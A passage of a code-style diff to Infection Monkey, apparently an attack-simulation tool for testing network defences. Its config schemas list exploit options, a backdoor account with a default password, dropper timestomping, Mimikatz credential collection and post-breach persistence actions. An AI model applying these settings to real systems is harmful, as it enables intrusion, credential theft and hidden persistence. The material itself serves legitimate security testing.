b/monkey/monkey_island/cc/services/config_schema/internal.py index a53c8ca4d..890e74efa 100644 --- a/monkey/monkey_island/cc/services/config_schema/internal.py +++ b/monkey/monkey_island/cc/services/config_schema/internal.py @@ -12,29 +12,28 @@ INTERNAL = { "title": "Singleton mutex name", "type": "string", "default": "{2384ec59-0df8-4ab9-918c-843740924a28}", - "description": - "The name of the mutex used to determine whether the monkey is already running" + "description": "The name of the mutex used to determine whether the monkey is already running", }, "keep_tunnel_open_time": { "title": "Keep tunnel open time", "type": "integer", "default": 60, - "description": "Time to keep tunnel open before going down after last exploit (in seconds)" + "description": "Time to keep tunnel open before going down after last exploit (in seconds)", }, "monkey_dir_name": { "title": "Monkey's directory name", "type": "string", "default": r"monkey_dir", - "description": "Directory name for the directory which will contain all of the monkey files" + "description": "Directory name for the directory which will contain all of the monkey files", }, "started_on_island": { "title": "Started on island", "type": "boolean", "default": False, "description": "Was exploitation started from island" - "(did monkey with max depth ran on island)" + "(did monkey with max depth ran on island)", }, - } + }, }, "monkey": { "title": "Monkey", @@ -44,75 +43,60 @@ INTERNAL = { "title": "Max victims to find", "type": "integer", "default": 100, - "description": "Determines the maximum number of machines the monkey is allowed to scan" + "description": "Determines the 
maximum number of machines the monkey is allowed to scan", }, "victims_max_exploit": { "title": "Max victims to exploit", "type": "integer", "default": 100, - "description": - "Determines the maximum number of machines the monkey" - " is allowed to successfully exploit. " + WARNING_SIGN - + " Note that setting this value too high may result in the monkey propagating to " - "a high number of machines" + "description": "Determines the maximum number of machines the monkey" + " is allowed to successfully exploit. " + + WARNING_SIGN + + " Note that setting this value too high may result in the monkey propagating to " + "a high number of machines", }, "internet_services": { "title": "Internet services", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, - "default": [ - "monkey.guardicore.com", - "www.google.com" - ], - "description": - "List of internet services to try and communicate with to determine internet" - " connectivity (use either ip or domain)" + "items": {"type": "string"}, + "default": ["monkey.guardicore.com", "www.google.com"], + "description": "List of internet services to try and communicate with to determine internet" + " connectivity (use either ip or domain)", }, "self_delete_in_cleanup": { "title": "Self delete on cleanup", "type": "boolean", "default": True, - "description": "Should the monkey delete its executable when going down" + "description": "Should the monkey delete its executable when going down", }, "use_file_logging": { "title": "Use file logging", "type": "boolean", "default": True, - "description": "Should the monkey dump to a log file" + "description": "Should the monkey dump to a log file", }, "serialize_config": { "title": "Serialize config", "type": "boolean", "default": False, - "description": "Should the monkey dump its config on startup" + "description": "Should the monkey dump its config on startup", }, "alive": { "title": "Alive", "type": "boolean", "default": True, - "description": "Is the monkey alive" + "description": "Is the monkey alive", }, "aws_keys": { "type": "object", "properties": { - "aws_access_key_id": { - "type": "string", - "default": "" - }, - "aws_secret_access_key": { - "type": "string", - "default": "" - }, - "aws_session_token": { - "type": "string", - "default": "" - } - } - } - } + "aws_access_key_id": {"type": "string", "default": ""}, + "aws_secret_access_key": {"type": "string", "default": ""}, + "aws_session_token": {"type": "string", "default": ""}, + }, + }, + }, }, "island_server": { "title": "Island server", @@ -122,22 +106,18 @@ INTERNAL = { "title": "Island server's IP's", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, - "default": [ - "192.0.2.0:5000" - ], + "items": {"type": "string"}, + "default": ["192.0.2.0:5000"], "description": "List of command servers/network interfaces to try to communicate with " - "(format is :)" + "(format is :)", }, "current_server": { "title": "Current server", "type": "string", "default": "192.0.2.0:5000", - "description": "The current command server the monkey is communicating with" - } - } + "description": "The current command server the monkey is communicating with", + }, + }, }, "network": { "title": "Network", @@ -151,26 +131,15 @@ INTERNAL = { "title": "HTTP ports", "type": "array", "uniqueItems": True, - "items": { - "type": "integer" - }, - "default": [ - 80, - 8080, - 443, - 8008, - 7001, - 9200 - ], - "description": "List of ports the monkey will check if are being used for HTTP" + "items": {"type": "integer"}, + "default": 
[80, 8080, 443, 8008, 7001, 9200], + "description": "List of ports the monkey will check if are being used for HTTP", }, "tcp_target_ports": { "title": "TCP target ports", "type": "array", "uniqueItems": True, - "items": { - "type": "integer" - }, + "items": {"type": "integer"}, "default": [ 22, 2222, @@ -183,29 +152,29 @@ INTERNAL = { 8008, 3306, 7001, - 8088 + 8088, ], - "description": "List of TCP ports the monkey will check whether they're open" + "description": "List of TCP ports the monkey will check whether they're open", }, "tcp_scan_interval": { "title": "TCP scan interval", "type": "integer", "default": 0, - "description": "Time to sleep (in milliseconds) between scans" + "description": "Time to sleep (in milliseconds) between scans", }, "tcp_scan_timeout": { "title": "TCP scan timeout", "type": "integer", "default": 3000, - "description": "Maximum time (in milliseconds) to wait for TCP response" + "description": "Maximum time (in milliseconds) to wait for TCP response", }, "tcp_scan_get_banner": { "title": "TCP scan - get banner", "type": "boolean", "default": True, - "description": "Determines whether the TCP scan should try to get the banner" - } - } + "description": "Determines whether the TCP scan should try to get the banner", + }, + }, }, "ping_scanner": { "title": "Ping scanner", @@ -215,11 +184,11 @@ INTERNAL = { "title": "Ping scan timeout", "type": "integer", "default": 1000, - "description": "Maximum time (in milliseconds) to wait for ping response" + "description": "Maximum time (in milliseconds) to wait for ping response", } - } - } - } + }, + }, + }, }, "classes": { "title": "Classes", @@ -229,9 +198,7 @@ INTERNAL = { "title": "Fingerprint classes", "type": "array", "uniqueItems": True, - "items": { - "$ref": "#/definitions/finger_classes" - }, + "items": {"$ref": "#/definitions/finger_classes"}, "default": [ "SMBFinger", "SSHFinger", @@ -240,10 +207,10 @@ INTERNAL = { "MySQLFinger", "MSSQLFinger", "ElasticFinger", - "PostgreSQLFinger" - ] + "PostgreSQLFinger", + ], } - } + }, }, "kill_file": { "title": "Kill file", @@ -253,15 +220,15 @@ INTERNAL = { "title": "Kill file path on Windows", "type": "string", "default": "%windir%\\monkey.not", - "description": "Path of file which kills monkey if it exists (on Windows)" + "description": "Path of file which kills monkey if it exists (on Windows)", }, "kill_file_path_linux": { "title": "Kill file path on Linux", "type": "string", "default": "/var/run/monkey.not", - "description": "Path of file which kills monkey if it exists (on Linux)" - } - } + "description": "Path of file which kills monkey if it exists (on Linux)", + }, + }, }, "dropper": { "title": "Dropper", @@ -271,55 +238,51 @@ INTERNAL = { "title": "Dropper sets date", "type": "boolean", "default": True, - "description": - "Determines whether the dropper should set the monkey's file date to be the same as" - " another file" + "description": "Determines whether the dropper should set the monkey's file date to be the same as" + " another file", }, "dropper_date_reference_path_windows": { "title": "Dropper date reference path (Windows)", "type": "string", "default": "%windir%\\system32\\kernel32.dll", - "description": - "Determines which file the dropper should copy the date from if it's configured to do" - " so on Windows (use fullpath)" + "description": "Determines which file the dropper should copy the date from if it's configured to do" + " so on Windows (use fullpath)", }, "dropper_date_reference_path_linux": { "title": "Dropper date reference path (Linux)", 
"type": "string", "default": "/bin/sh", - "description": - "Determines which file the dropper should copy the date from if it's configured to do" - " so on Linux (use fullpath)" + "description": "Determines which file the dropper should copy the date from if it's configured to do" + " so on Linux (use fullpath)", }, "dropper_target_path_linux": { "title": "Dropper target path on Linux", "type": "string", "default": "/tmp/monkey", - "description": "Determines where should the dropper place the monkey on a Linux machine" + "description": "Determines where should the dropper place the monkey on a Linux machine", }, "dropper_target_path_win_32": { "title": "Dropper target path on Windows (32bit)", "type": "string", "default": "C:\\Windows\\temp\\monkey32.exe", "description": "Determines where should the dropper place the monkey on a Windows machine " - "(32bit)" + "(32bit)", }, "dropper_target_path_win_64": { "title": "Dropper target path on Windows (64bit)", "type": "string", "default": "C:\\Windows\\temp\\monkey64.exe", "description": "Determines where should the dropper place the monkey on a Windows machine " - "(64 bit)" + "(64 bit)", }, "dropper_try_move_first": { "title": "Try to move first", "type": "boolean", "default": True, - "description": - "Determines whether the dropper should try to move itself instead of copying itself" - " to target path" - } - } + "description": "Determines whether the dropper should try to move itself instead of copying itself" + " to target path", + }, + }, }, "logging": { "title": "Logging", @@ -329,33 +292,33 @@ INTERNAL = { "title": "Dropper log file path on Linux", "type": "string", "default": "/tmp/user-1562", - "description": "The fullpath of the dropper log file on Linux" + "description": "The fullpath of the dropper log file on Linux", }, "dropper_log_path_windows": { "title": "Dropper log file path on Windows", "type": "string", "default": "%temp%\\~df1562.tmp", - "description": "The fullpath of the dropper log file on Windows" + "description": "The fullpath of the dropper log file on Windows", }, "monkey_log_path_linux": { "title": "Monkey log file path on Linux", "type": "string", "default": "/tmp/user-1563", - "description": "The fullpath of the monkey log file on Linux" + "description": "The fullpath of the monkey log file on Linux", }, "monkey_log_path_windows": { "title": "Monkey log file path on Windows", "type": "string", "default": "%temp%\\~df1563.tmp", - "description": "The fullpath of the monkey log file on Windows" + "description": "The fullpath of the monkey log file on Windows", }, "send_log_to_server": { "title": "Send log to server", "type": "boolean", "default": True, - "description": "Determines whether the monkey sends its log to the Monkey Island server" - } - } + "description": "Determines whether the monkey sends its log to the Monkey Island server", + }, + }, }, "exploits": { "title": "Exploits", @@ -365,32 +328,27 @@ INTERNAL = { "title": "Exploit LM hash list", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, + "items": {"type": "string"}, "default": [], - "description": "List of LM hashes to use on exploits using credentials" + "description": "List of LM hashes to use on exploits using credentials", }, "exploit_ntlm_hash_list": { "title": "Exploit NTLM hash list", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, + "items": {"type": "string"}, "default": [], - "description": "List of NTLM hashes to use on exploits using credentials" + "description": "List of NTLM hashes 
to use on exploits using credentials", }, "exploit_ssh_keys": { "title": "SSH key pairs list", "type": "array", "uniqueItems": True, "default": [], - "items": { - "type": "string" - }, - "description": "List of SSH key pairs to use, when trying to ssh into servers" - }, "general": { + "items": {"type": "string"}, + "description": "List of SSH key pairs to use, when trying to ssh into servers", + }, + "general": { "title": "General", "type": "object", "properties": { @@ -399,9 +357,9 @@ INTERNAL = { "type": "boolean", "default": False, "description": "Determines whether the monkey should skip the exploit if the monkey's file" - " is already on the remote machine" + " is already on the remote machine", } - } + }, }, "ms08_067": { "title": "MS08_067", @@ -411,21 +369,21 @@ INTERNAL = { "title": "MS08_067 exploit attempts", "type": "integer", "default": 5, - "description": "Number of attempts to exploit using MS08_067" + "description": "Number of attempts to exploit using MS08_067", }, "user_to_add": { "title": "Remote user", "type": "string", "default": "Monkey_IUSER_SUPPORT", - "description": "Username to add on successful exploit" + "description": "Username to add on successful exploit", }, "remote_user_pass": { "title": "Remote user password", "type": "string", "default": "Password1!", - "description": "Password to use for created user" - } - } + "description": "Password to use for created user", + }, + }, }, "sambacry": { "title": "SambaCry", @@ -435,41 +393,35 @@ INTERNAL = { "title": "SambaCry trigger timeout", "type": "integer", "default": 5, - "description": "Timeout (in seconds) of SambaCry trigger" + "description": "Timeout (in seconds) of SambaCry trigger", }, "sambacry_folder_paths_to_guess": { "title": "SambaCry folder paths to guess", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, + "items": {"type": "string"}, "default": [ - '/', - '/mnt', - '/tmp', - '/storage', - '/export', - '/share', - '/shares', - '/home' + "/", + "/mnt", + "/tmp", + "/storage", + "/export", + "/share", + "/shares", + "/home", ], - "description": "List of full paths to share folder for SambaCry to guess" + "description": "List of full paths to share folder for SambaCry to guess", }, "sambacry_shares_not_to_check": { "title": "SambaCry shares not to check", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, - "default": [ - "IPC$", "print$" - ], - "description": "These shares won't be checked when exploiting with SambaCry" - } - } - } + "items": {"type": "string"}, + "default": ["IPC$", "print$"], + "description": "These shares won't be checked when exploiting with SambaCry", + }, + }, + }, }, "smb_service": { "title": "SMB service", @@ -479,17 +431,16 @@ INTERNAL = { "title": "SMB download timeout", "type": "integer", "default": 300, - "description": - "Timeout (in seconds) for SMB download operation (used in various exploits using SMB)" + "description": "Timeout (in seconds) for SMB download operation (used in various exploits using SMB)", }, "smb_service_name": { "title": "SMB service name", "type": "string", "default": "InfectionMonkey", - "description": "Name of the SMB service that will be set up to download monkey" - } - } - } + "description": "Name of the SMB service that will be set up to download monkey", + }, + }, + }, }, "testing": { "title": "Testing", @@ -500,9 +451,9 @@ INTERNAL = { "type": "boolean", "default": False, "description": "Exports unencrypted telemetries that can be used for tests in development." - " Do not turn on!" 
+ " Do not turn on!", } - } - } - } + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/config_schema/monkey.py b/monkey/monkey_island/cc/services/config_schema/monkey.py index 82a394b65..0d69c5aa4 100644 --- a/monkey/monkey_island/cc/services/config_schema/monkey.py +++ b/monkey/monkey_island/cc/services/config_schema/monkey.py @@ -1,6 +1,11 @@ -from common.common_consts.system_info_collectors_names import (AWS_COLLECTOR, AZURE_CRED_COLLECTOR, - ENVIRONMENT_COLLECTOR, HOSTNAME_COLLECTOR, - MIMIKATZ_COLLECTOR, PROCESS_LIST_COLLECTOR) +from common.common_consts.system_info_collectors_names import ( + AWS_COLLECTOR, + AZURE_CRED_COLLECTOR, + ENVIRONMENT_COLLECTOR, + HOSTNAME_COLLECTOR, + MIMIKATZ_COLLECTOR, + PROCESS_LIST_COLLECTOR, +) MONKEY = { "title": "Monkey", @@ -15,54 +20,52 @@ MONKEY = { "type": "string", "default": "", "description": "Command to be executed after breaching. " - "Use this field to run custom commands or execute uploaded " - "files on exploited machines.\nExample: " - "\"chmod +x ./my_script.sh; ./my_script.sh ; rm ./my_script.sh\"" + "Use this field to run custom commands or execute uploaded " + "files on exploited machines.\nExample: " + '"chmod +x ./my_script.sh; ./my_script.sh ; rm ./my_script.sh"', }, "PBA_linux_file": { "title": "Linux post-breach file", "type": "string", "format": "data-url", "description": "File to be uploaded after breaching. " - "Use the 'Linux post-breach command' field to " - "change permissions, run, or delete the file. " - "Reference your file by filename." + "Use the 'Linux post-breach command' field to " + "change permissions, run, or delete the file. " + "Reference your file by filename.", }, "custom_PBA_windows_cmd": { "title": "Windows post-breach command", "type": "string", "default": "", "description": "Command to be executed after breaching. " - "Use this field to run custom commands or execute uploaded " - "files on exploited machines.\nExample: " - "\"my_script.bat & del my_script.bat\"" + "Use this field to run custom commands or execute uploaded " + "files on exploited machines.\nExample: " + '"my_script.bat & del my_script.bat"', }, "PBA_windows_file": { "title": "Windows post-breach file", "type": "string", "format": "data-url", "description": "File to be uploaded after breaching. " - "Use the 'Windows post-breach command' field to " - "change permissions, run, or delete the file. " - "Reference your file by filename." + "Use the 'Windows post-breach command' field to " + "change permissions, run, or delete the file. 
" + "Reference your file by filename.", }, "PBA_windows_filename": { "title": "Windows PBA filename", "type": "string", - "default": "" + "default": "", }, "PBA_linux_filename": { "title": "Linux PBA filename", "type": "string", - "default": "" + "default": "", }, "post_breach_actions": { "title": "Post breach actions", "type": "array", "uniqueItems": True, - "items": { - "$ref": "#/definitions/post_breach_actions" - }, + "items": {"$ref": "#/definitions/post_breach_actions"}, "default": [ "BackdoorUser", "CommunicateAsNewUser", @@ -72,10 +75,10 @@ MONKEY = { "ChangeSetuidSetgid", "ScheduleJobs", "Timestomping", - "AccountDiscovery" - ] + "AccountDiscovery", + ], }, - } + }, }, "system_info": { "title": "System info", @@ -85,19 +88,17 @@ MONKEY = { "title": "System info collectors", "type": "array", "uniqueItems": True, - "items": { - "$ref": "#/definitions/system_info_collector_classes" - }, + "items": {"$ref": "#/definitions/system_info_collector_classes"}, "default": [ ENVIRONMENT_COLLECTOR, AWS_COLLECTOR, HOSTNAME_COLLECTOR, PROCESS_LIST_COLLECTOR, MIMIKATZ_COLLECTOR, - AZURE_CRED_COLLECTOR - ] + AZURE_CRED_COLLECTOR, + ], }, - } + }, }, "persistent_scanning": { "title": "Persistent scanning", @@ -109,25 +110,23 @@ MONKEY = { "default": 1, "minimum": 1, "description": "Determines how many iterations of the monkey's full lifecycle should occur " - "(how many times to do the scan)" + "(how many times to do the scan)", }, "timeout_between_iterations": { "title": "Wait time between iterations", "type": "integer", "default": 100, "minimum": 0, - "description": - "Determines for how long (in seconds) should the monkey wait before starting another scan" + "description": "Determines for how long (in seconds) should the monkey wait before starting another scan", }, "retry_failed_explotation": { "title": "Retry failed exploitation", "type": "boolean", "default": True, - "description": - "Determines whether the monkey should retry exploiting machines" - " it didn't successfully exploit on previous scans" - } - } - } - } + "description": "Determines whether the monkey should retry exploiting machines" + " it didn't successfully exploit on previous scans", + }, + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/database.py b/monkey/monkey_island/cc/services/database.py index 6144b6ef3..2efd3643a 100644 --- a/monkey/monkey_island/cc/services/database.py +++ b/monkey/monkey_island/cc/services/database.py @@ -17,15 +17,18 @@ class Database(object): @staticmethod def reset_db(): - logger.info('Resetting database') + logger.info("Resetting database") remove_PBA_files() # We can't drop system collections. 
- [Database.drop_collection(x) for x in mongo.db.collection_names() if not x.startswith('system.') - and not x == AttackMitigations.COLLECTION_NAME] + [ + Database.drop_collection(x) + for x in mongo.db.collection_names() + if not x.startswith("system.") and not x == AttackMitigations.COLLECTION_NAME + ] ConfigService.init_config() AttackConfig.reset_config() - logger.info('DB was reset') - return jsonify(status='OK') + logger.info("DB was reset") + return jsonify(status="OK") @staticmethod def drop_collection(collection_name: str): diff --git a/monkey/monkey_island/cc/services/edge/displayed_edge.py b/monkey/monkey_island/cc/services/edge/displayed_edge.py index f7a0664bf..67d42a3ab 100644 --- a/monkey/monkey_island/cc/services/edge/displayed_edge.py +++ b/monkey/monkey_island/cc/services/edge/displayed_edge.py @@ -9,7 +9,6 @@ __author__ = "itay.mizeretz" class DisplayedEdgeService: - @staticmethod def get_displayed_edges_by_dst(dst_id: str, for_report=False): edges = EdgeService.get_by_dst_node(dst_node_id=ObjectId(dst_id)) @@ -27,8 +26,9 @@ class DisplayedEdgeService: os = {} if len(edge.scans) > 0: - services = DisplayedEdgeService.services_to_displayed_services(edge.scans[-1]["data"]["services"], - for_report) + services = DisplayedEdgeService.services_to_displayed_services( + edge.scans[-1]["data"]["services"], for_report + ) os = edge.scans[-1]["data"]["os"] displayed_edge = DisplayedEdgeService.edge_to_net_edge(edge) @@ -44,15 +44,14 @@ class DisplayedEdgeService: @staticmethod def generate_pseudo_edge(edge_id, src_node_id, dst_node_id, src_label, dst_label): - edge = \ - { - "id": edge_id, - "from": src_node_id, - "to": dst_node_id, - "group": "island", - "src_label": src_label, - "dst_label": dst_label - } + edge = { + "id": edge_id, + "from": src_node_id, + "to": dst_node_id, + "group": "island", + "src_label": src_label, + "dst_label": dst_label, + } edge["_label"] = DisplayedEdgeService.get_pseudo_label(edge) return edge @@ -65,19 +64,21 @@ class DisplayedEdgeService: if for_report: return [x for x in services] else: - return [x + ": " + (services[x]['name'] if 'name' in services[x] else 'unknown') for x in services] + return [ + x + ": " + (services[x]["name"] if "name" in services[x] else "unknown") + for x in services + ] @staticmethod def edge_to_net_edge(edge: EdgeService): - return \ - { - "id": edge.id, - "from": edge.src_node_id, - "to": edge.dst_node_id, - "group": edge.get_group(), - "src_label": edge.src_label, - "dst_label": edge.dst_label - } + return { + "id": edge.id, + "from": edge.src_node_id, + "to": edge.dst_node_id, + "group": edge.get_group(), + "src_label": edge.src_label, + "dst_label": edge.dst_label, + } RIGHT_ARROW = "\u2192" diff --git a/monkey/monkey_island/cc/services/edge/edge.py b/monkey/monkey_island/cc/services/edge/edge.py index 4c9ef57d7..461b0e8a5 100644 --- a/monkey/monkey_island/cc/services/edge/edge.py +++ b/monkey/monkey_island/cc/services/edge/edge.py @@ -12,7 +12,6 @@ RIGHT_ARROW = "\u2192" class EdgeService(Edge): - @staticmethod def get_all_edges() -> List[EdgeService]: return EdgeService.objects() @@ -44,7 +43,9 @@ class EdgeService(Edge): elif self.dst_node_id == node_id: self.dst_label = label else: - raise DoesNotExist("Node id provided does not match with any endpoint of an self provided.") + raise DoesNotExist( + "Node id provided does not match with any endpoint of an self provided." 
+ ) self.save() @staticmethod @@ -65,12 +66,8 @@ class EdgeService(Edge): self.save() def update_based_on_scan_telemetry(self, telemetry: Dict): - machine_info = copy.deepcopy(telemetry['data']['machine']) - new_scan = \ - { - "timestamp": telemetry["timestamp"], - "data": machine_info - } + machine_info = copy.deepcopy(telemetry["data"]["machine"]) + new_scan = {"timestamp": telemetry["timestamp"], "data": machine_info} ip_address = machine_info.pop("ip_addr") domain_name = machine_info.pop("domain_name") self.scans.append(new_scan) @@ -81,7 +78,7 @@ class EdgeService(Edge): def update_based_on_exploit(self, exploit: Dict): self.exploits.append(exploit) self.save() - if exploit['result']: + if exploit["result"]: self.set_exploited() def set_exploited(self): diff --git a/monkey/monkey_island/cc/services/edge/test_displayed_edge.py b/monkey/monkey_island/cc/services/edge/test_displayed_edge.py index 5aa97d923..2938909c2 100644 --- a/monkey/monkey_island/cc/services/edge/test_displayed_edge.py +++ b/monkey/monkey_island/cc/services/edge/test_displayed_edge.py @@ -3,45 +3,43 @@ from bson import ObjectId from monkey_island.cc.services.edge.displayed_edge import DisplayedEdgeService from monkey_island.cc.services.edge.edge import RIGHT_ARROW, EdgeService -SCAN_DATA_MOCK = [{ - "timestamp": "2020-05-27T14:59:28.944Z", - "data": { - "os": { - "type": "linux", - "version": "Ubuntu-4ubuntu2.8" - }, - "services": { - "tcp-8088": { - "display_name": "unknown(TCP)", - "port": 8088 +SCAN_DATA_MOCK = [ + { + "timestamp": "2020-05-27T14:59:28.944Z", + "data": { + "os": {"type": "linux", "version": "Ubuntu-4ubuntu2.8"}, + "services": { + "tcp-8088": {"display_name": "unknown(TCP)", "port": 8088}, + "tcp-22": { + "display_name": "SSH", + "port": 22, + "banner": "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8\r\n", + "name": "ssh", + }, }, - "tcp-22": { - "display_name": "SSH", - "port": 22, - "banner": "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8\r\n", - "name": "ssh" - } + "monkey_exe": None, + "default_tunnel": None, + "default_server": None, }, - "monkey_exe": None, - "default_tunnel": None, - "default_server": None } -}] +] -EXPLOIT_DATA_MOCK = [{ - "result": True, - "exploiter": "ElasticGroovyExploiter", - "info": { - "display_name": "Elastic search", - "started": "2020-05-11T08:59:38.105Z", - "finished": "2020-05-11T08:59:38.106Z", - "vulnerable_urls": [], - "vulnerable_ports": [], - "executed_cmds": [] - }, - "attempts": [], - "timestamp": "2020-05-27T14:59:29.048Z" -}] +EXPLOIT_DATA_MOCK = [ + { + "result": True, + "exploiter": "ElasticGroovyExploiter", + "info": { + "display_name": "Elastic search", + "started": "2020-05-11T08:59:38.105Z", + "finished": "2020-05-11T08:59:38.106Z", + "vulnerable_urls": [], + "vulnerable_ports": [], + "executed_cmds": [], + }, + "attempts": [], + "timestamp": "2020-05-27T14:59:29.048Z", + } +] class TestDisplayedEdgeService: @@ -61,33 +59,37 @@ class TestDisplayedEdgeService: def test_edge_to_displayed_edge(self): src_node_id = ObjectId() dst_node_id = ObjectId() - edge = EdgeService(src_node_id=src_node_id, - dst_node_id=dst_node_id, - scans=SCAN_DATA_MOCK, - exploits=EXPLOIT_DATA_MOCK, - exploited=True, - domain_name=None, - ip_address="10.2.2.2", - dst_label="Ubuntu-4ubuntu2.8", - src_label="Ubuntu-4ubuntu3.2") + edge = EdgeService( + src_node_id=src_node_id, + dst_node_id=dst_node_id, + scans=SCAN_DATA_MOCK, + exploits=EXPLOIT_DATA_MOCK, + exploited=True, + domain_name=None, + ip_address="10.2.2.2", + dst_label="Ubuntu-4ubuntu2.8", + src_label="Ubuntu-4ubuntu3.2", + ) 
displayed_edge = DisplayedEdgeService.edge_to_displayed_edge(edge) - assert displayed_edge['to'] == dst_node_id - assert displayed_edge['from'] == src_node_id - assert displayed_edge['ip_address'] == "10.2.2.2" - assert displayed_edge['services'] == ["tcp-8088: unknown", "tcp-22: ssh"] - assert displayed_edge['os'] == {"type": "linux", "version": "Ubuntu-4ubuntu2.8"} - assert displayed_edge['exploits'] == EXPLOIT_DATA_MOCK - assert displayed_edge['_label'] == "Ubuntu-4ubuntu3.2 " + RIGHT_ARROW + " Ubuntu-4ubuntu2.8" - assert displayed_edge['group'] == "exploited" + assert displayed_edge["to"] == dst_node_id + assert displayed_edge["from"] == src_node_id + assert displayed_edge["ip_address"] == "10.2.2.2" + assert displayed_edge["services"] == ["tcp-8088: unknown", "tcp-22: ssh"] + assert displayed_edge["os"] == {"type": "linux", "version": "Ubuntu-4ubuntu2.8"} + assert displayed_edge["exploits"] == EXPLOIT_DATA_MOCK + assert displayed_edge["_label"] == "Ubuntu-4ubuntu3.2 " + RIGHT_ARROW + " Ubuntu-4ubuntu2.8" + assert displayed_edge["group"] == "exploited" return displayed_edge def test_services_to_displayed_services(self): - services1 = DisplayedEdgeService.services_to_displayed_services(SCAN_DATA_MOCK[-1]["data"]["services"], - True) + services1 = DisplayedEdgeService.services_to_displayed_services( + SCAN_DATA_MOCK[-1]["data"]["services"], True + ) assert services1 == ["tcp-8088", "tcp-22"] - services2 = DisplayedEdgeService.services_to_displayed_services(SCAN_DATA_MOCK[-1]["data"]["services"], - False) + services2 = DisplayedEdgeService.services_to_displayed_services( + SCAN_DATA_MOCK[-1]["data"]["services"], False + ) assert services2 == ["tcp-8088: unknown", "tcp-22: ssh"] diff --git a/monkey/monkey_island/cc/services/edge/test_edge.py b/monkey/monkey_island/cc/services/edge/test_edge.py index f327bc2d1..99ecf52d7 100644 --- a/monkey/monkey_island/cc/services/edge/test_edge.py +++ b/monkey/monkey_island/cc/services/edge/test_edge.py @@ -11,7 +11,6 @@ logger = logging.getLogger(__name__) class TestEdgeService: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_get_or_create_edge(self): src_id = ObjectId() @@ -34,9 +33,7 @@ class TestEdgeService: assert len(Edge.objects()) == 1 def test_get_edge_group(self): - edge = Edge(src_node_id=ObjectId(), - dst_node_id=ObjectId(), - exploited=True) + edge = Edge(src_node_id=ObjectId(), dst_node_id=ObjectId(), exploited=True) assert "exploited" == EdgeService.get_group(edge) edge.exploited = False diff --git a/monkey/monkey_island/cc/services/groups_and_users_consts.py b/monkey/monkey_island/cc/services/groups_and_users_consts.py index 0e22a34ba..4121688d1 100644 --- a/monkey/monkey_island/cc/services/groups_and_users_consts.py +++ b/monkey/monkey_island/cc/services/groups_and_users_consts.py @@ -1,6 +1,6 @@ """This file will include consts values regarding the groupsandusers collection""" -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" USERTYPE = 1 GROUPTYPE = 2 diff --git a/monkey/monkey_island/cc/services/infection_lifecycle.py b/monkey/monkey_island/cc/services/infection_lifecycle.py index 44d303fc3..1f4c0e87e 100644 --- a/monkey/monkey_island/cc/services/infection_lifecycle.py +++ b/monkey/monkey_island/cc/services/infection_lifecycle.py @@ -8,21 +8,25 @@ from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.report import ReportService -from 
monkey_island.cc.services.reporting.report_generation_synchronisation import (is_report_being_generated, - safe_generate_reports) +from monkey_island.cc.services.reporting.report_generation_synchronisation import ( + is_report_being_generated, + safe_generate_reports, +) logger = logging.getLogger(__name__) class InfectionLifecycle: - @staticmethod def kill_all(): - mongo.db.monkey.update({'dead': False}, {'$set': {'config.alive': False, 'modifytime': datetime.now()}}, - upsert=False, - multi=True) - logger.info('Kill all monkeys was called') - return jsonify(status='OK') + mongo.db.monkey.update( + {"dead": False}, + {"$set": {"config.alive": False, "modifytime": datetime.now()}}, + upsert=False, + multi=True, + ) + logger.info("Kill all monkeys was called") + return jsonify(status="OK") @staticmethod def get_completed_steps(): @@ -39,7 +43,8 @@ class InfectionLifecycle: run_server=True, run_monkey=is_any_exists, infection_done=infection_done, - report_done=report_done) + report_done=report_done, + ) @staticmethod def _on_finished_infection(): diff --git a/monkey/monkey_island/cc/services/island_logs.py b/monkey/monkey_island/cc/services/island_logs.py index be6aae12d..846b2e844 100644 --- a/monkey/monkey_island/cc/services/island_logs.py +++ b/monkey/monkey_island/cc/services/island_logs.py @@ -20,14 +20,12 @@ class IslandLogService: """ logger_handlers = logger.parent.handlers for handler in logger_handlers: - if hasattr(handler, 'baseFilename'): - logger.info('Log file found: {0}'.format(handler.baseFilename)) + if hasattr(handler, "baseFilename"): + logger.info("Log file found: {0}".format(handler.baseFilename)) log_file_path = handler.baseFilename - with open(log_file_path, 'rt') as f: + with open(log_file_path, "rt") as f: log_file = f.read() - return { - 'log_file': log_file - } + return {"log_file": log_file} - logger.warning('No log file could be found, check logger config.') + logger.warning("No log file could be found, check logger config.") return None diff --git a/monkey/monkey_island/cc/services/log.py b/monkey/monkey_island/cc/services/log.py index a10e51f86..f4f3374d6 100644 --- a/monkey/monkey_island/cc/services/log.py +++ b/monkey/monkey_island/cc/services/log.py @@ -12,37 +12,33 @@ class LogService: @staticmethod def get_log_by_monkey_id(monkey_id): - log = mongo.db.log.find_one({'monkey_id': monkey_id}) + log = mongo.db.log.find_one({"monkey_id": monkey_id}) if log: - log_file = database.gridfs.get(log['file_id']) + log_file = database.gridfs.get(log["file_id"]) monkey_label = monkey_island.cc.services.node.NodeService.get_monkey_label( - monkey_island.cc.services.node.NodeService.get_monkey_by_id(log['monkey_id'])) - return \ - { - 'monkey_label': monkey_label, - 'log': log_file.read().decode(), - 'timestamp': log['timestamp'] - } + monkey_island.cc.services.node.NodeService.get_monkey_by_id(log["monkey_id"]) + ) + return { + "monkey_label": monkey_label, + "log": log_file.read().decode(), + "timestamp": log["timestamp"], + } @staticmethod def remove_logs_by_monkey_id(monkey_id): - log = mongo.db.log.find_one({'monkey_id': monkey_id}) + log = mongo.db.log.find_one({"monkey_id": monkey_id}) if log is not None: - database.gridfs.delete(log['file_id']) - mongo.db.log.delete_one({'monkey_id': monkey_id}) + database.gridfs.delete(log["file_id"]) + mongo.db.log.delete_one({"monkey_id": monkey_id}) @staticmethod def add_log(monkey_id, log_data, timestamp=datetime.now()): 